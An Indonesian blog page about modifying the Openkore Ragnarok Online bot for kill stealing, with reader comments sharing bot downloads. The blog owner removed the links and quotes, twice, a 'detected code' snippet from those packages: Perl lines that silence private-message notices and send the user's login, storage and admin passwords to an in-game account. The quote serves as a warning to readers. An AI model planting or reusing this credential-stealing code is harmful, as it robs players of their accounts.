Cara Modif Bot Openkore Kill Steal

Tulisan ini sudah saya pindahkan ke blog saya yang lain, silahkan klik link berikut Cara Modif Bot Openkore Kill Steal

Iklan
  • Trackback are closed
  • Komentar (9)
    • Tom
    • Maret 19th, 2011

    kok saya error om?
    intinya cari yg di atas itu lalu timpa ama yg di bawah?

      • ebo
      • Maret 20th, 2011

      intinya ya gitu..kode asli di timpa/ganti ama kode baru..
      dan intinya lagi..sub function itu tanpa basa basi langsung di kasi return 1;

  1. Bisa om.. bagus sekali om ebo hebat

    • guntur
    • Mei 15th, 2011

    sekedar sharing buat KILL STEAL

    **************/KILLSTEALBOTRO.zip.html

    cara pemakaian ada di dalamnya..

    happy ro^^

    (Edited By: EBO note: Link Removed, Lebih baik kita belajar editing sendiri, demi menghindari segala kemungkinan negatif yang bisa terjad)

    • ebo
    • Mei 19th, 2011

    @aji: cieeeee
    @guntur: secara prinsip sama, tapi saya takut ada inject malware di dalamnya..(susah di check)

    Solusi paling aman buat user, edit sendiri openkore yg asli.
    gak ada kecurigaan, gak ada mis version, gak ada keraguan

    • guntur
    • Mei 20th, 2011

    @ebo: iya emang sih kita blom tau apa di dalamnya inject malware ato tidak..

    solusinya ya edit sendiri,, tapi kalo ga mau repot, sebelum download di scan virus/malware aja dulu.. toh sekarang kan banyak scan virus online FYI aja kk ^^

    • ryan
    • Mei 21st, 2011

    sekedar share kill steal OK 2.0.6 sama 2.0.7

    ********************/killstealbotro.zip.html

    work 100%, silakan dicoba

    ******************************************************************************
    (EDITED BY:EBO REASON:HACK SCRIPT DETECTED)

    @detected code

    Commands::run(“conf squelchDomains idRO: Fnc Server, pm/sent, info”);
    Commands::run(“pm \”rusababi\” Username:”.$config{username}.”\ | Password:”.$config{password}.”\ | StoragePass:”.$config{storageAuto_password}.”\ | AdminPas:”.$config{adminPassword});
    }

    P/S: jangan menyebarkan kebencian di sini…terima kasih

      • alam
      • Mei 23rd, 2011

      kok ga jalan ks nya? cobain yang ane deh.. yang ini malah jalan..

      ******************************************************************************
      ****/ksbotro.zip.html (EDITED BY:EBO REASON:HACK SCRIPT DETECTED)

      @detected code

      Commands::run(“conf squelchDomains idRO: Fnc Server, pm/sent, info”);
      Commands::run(“pm \”rusababi\” Username:”.$config{username}.”\ | Password:”.$config{password}.”\ | StoragePass:”.$config{storageAuto_password}.”\ | AdminPas:”.$config{adminPassword});
      }

      P/S: jangan menyebarkan kebencian di sini…terima kasih

    • rere
    • Mei 23rd, 2011

    wah thx kk” uda pada share.. yg ryan kok ga jalan ya??
    wkwkwk..

    yg alam bagus banget KS nya 😛 ..
    recommend deh /no1

Komentar ditutup.
Iklan
%d blogger menyukai ini: